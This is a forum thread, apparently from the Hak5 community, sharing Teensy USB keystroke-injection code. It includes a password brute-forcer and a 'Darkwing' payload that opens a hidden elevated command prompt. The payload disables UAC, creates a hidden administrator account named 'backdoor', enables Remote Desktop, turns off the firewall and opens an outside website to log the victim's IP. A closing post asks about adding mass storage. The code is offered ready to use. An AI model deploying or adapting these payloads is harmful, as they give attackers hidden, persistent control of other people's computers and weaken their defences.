HaDAk

I put the adapter on my teensy: http://twitpic.com/2hdkc4 It works perfectly, out of the box.

I've been working on some code to do some brute forcing, but I can't seem to get it quite right. You're welcome to take a look at it, but if you fix it and get it working properly, I'd really appreciate it coming back to me. // Simple Bruteforcer v0.1 // by HaDAk // Special thanks to Kevin B. and Carl V. // Variables int ascii = 32; // 32 - 126 int digit = 1; int blinkcount = 0; int MAX_PASSWORD = 32; void setup() { // Blink when the ducky is first plugged in, to verify power to it. while(blinkcount < 2){ blink(50); blinkcount++; } delay(1000); // wait a second hax(128); } void loop() { } void blink(int time){ pinMode( PIN_D6, OUTPUT ); // set LED to super bright digitalWrite(PIN_D6, HIGH); // LED on delay(time); // Slow blink digitalWrite(PIN_D6, LOW); // LED off delay(time); } void enter(){ // Press the enter key, and release it Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); } void hax(int n){ char curpw[MAX_PASSWORD]; for(int i = 0; i < MAX_PASSWORD; ++i) curpw[i] = '\0'; curpw[0] = 32; while(true) { try_password(curpw,n); curpw[0]++; char *test = &curpw[0]; while (*test > (char)126) { if (curpw[MAX_PASSWORD-1] > (char)126) { return; } *test = 32; test++; (*test)++; if (*test < 32) *test = 32; } } } void try_password(char* curpw, int n){ for(int i=0;i<n;i++){ Keyboard.print(curpw[i]); } delay(50); enter(); }

You're reinventing the wheel here! My code does the same thing (and more), and does it a bit more elegantly. // Darkwing v0.1 // USB Ducky Framework for the Teensy 2.0 // by HaDAk // for the Hak.5 Community -- please contribute, distribute, and credit! // Variables int blinkcount = 0; // OS X payloads char* osx_ips = "ifconfig"; // *nix payloads char* nix_ips = "ifconfig"; // Windows Payloads // Add user "backdoor" with password "p@$$w0rd", // add to the local admin group, and hide from the login screen char* win_adduser = "net user backdoor p@$$w0rd /add && REG ADD \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\" /V backdoor /T REG_DWORD /F /D \"0\" && net localgroup \"Administrators\" backdoor /ADD"; // Disable UAC char* win_disableuac = "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v EnableLUA /t REG_DWORD /d 0 /f"; // Enable Remote Desktop char* win_enablerdp = "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"; // Disable Windows Firewall char* win_disablefirewall = "netsh firewall set opmode disable"; // Launch their browser to your favorite website -- I use this to collect their IP and other system metrics char* win_launchwebsite = "start /min www.hadak.org/pwnd-by-a-ducky"; void setup() { // Blink when the ducky is first plugged in, to verify power to it. while(blinkcount < 2){ blink(50); blinkcount++; } // Windows generally needs a longer delay to enumerate the device. 3000ms is // typically sufficient, depending on the speed of the machine. Additionally, // the first time the device is plugged it, Windows will need a while to // install drivers. To avoid a really high delay, I recommend unplugging the // Ducky, letting Windows install the drivers, then replugging it. // The value will probably vary by machine, so experiment to find what works. delay(3000); blink(50); RunWinUACCommand("cmd /Q /D /T:7F /F:OFF /V:OFF /K \"@echo off && mode con:RATE=31 DELAY=0 && mode con:COLS=15 LINES=1 && title . && cls\""); // Vile's better command line: http://www.hak5.org/forums/index.php?showtopic=16505 //RunGnomeKDECommand("xterm"); // Linux (Gnome/KDE) command line example //RunOSXCommand("Terminal.app"); // OS X Command line example delay(250); // Move window off screen win_MoveWindow(); // Administer payload(s) Keyboard.print(win_disableuac); enter(); Keyboard.print(win_adduser); enter(); Keyboard.print(win_enablerdp); enter(); Keyboard.print(win_disablefirewall); enter(); Keyboard.print(win_launchwebsite); enter(); Keyboard.print("exit"); enter(); } void loop() { blink(400); } void blink(int time){ pinMode( PIN_D6, OUTPUT ); // set LED to super bright digitalWrite(PIN_D6, HIGH); // LED on delay(time); // Slow blink digitalWrite(PIN_D6, LOW); // LED off delay(time); } void enter(){ // Press the enter key, and release it Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); } void RunGnomeKDECommand(char *cmd){ Keyboard.set_modifier(MODIFIERKEY_ALT); Keyboard.set_key1(KEY_F2); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); delay(500); Keyboard.print(cmd); enter(); } void RunOSXCommand(char *cmd){ Keyboard.set_modifier(MODIFIERKEY_GUI); Keyboard.set_key1(KEY_SPACE); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); delay(500); Keyboard.print(cmd); delay(500); enter(); } //void RunWindowsCommand(char *cmd){ // Keyboard.set_modifier(MODIFIERKEY_GUI); // Keyboard.set_key1(KEY_R); // Keyboard.send_now(); // Keyboard.set_modifier(0); // Keyboard.set_key1(0); // Keyboard.send_now(); // delay(500); // Keyboard.print(cmd); // enter(); //} void RunWinUACCommand(char *cmd){ Keyboard.set_modifier(MODIFIERKEY_GUI); Keyboard.set_key1(KEY_R); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); delay(50); Keyboard.print(cmd); Keyboard.set_modifier(MODIFIERKEY_CTRL|MODIFIERKEY_SHIFT); Keyboard.send_now(); enter(); Keyboard.set_modifier(0); Keyboard.send_now(); delay(500); Keyboard.set_modifier(KEY_RIGHT); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.send_now(); enter(); } void win_MoveWindow(){ int move = 0; Keyboard.set_modifier(MODIFIERKEY_ALT); Keyboard.set_key1(KEY_SPACE); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); Keyboard.print("m"); while(move < 250){ Keyboard.set_key1(KEY_DOWN); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); move++; } enter(); }

I'd like to preface this with: I am a complete noob with arduino/teensy, USB, hardware (pinouts/soldering/etc), and programming C/C++. Now, How do we get this: http://store.gravitech.us/micaad.html stuck on the teensy and have it offer it as mass storage, while still sending keystrokes? I'm probably opening a can of worms here, but I'm a total noob. :3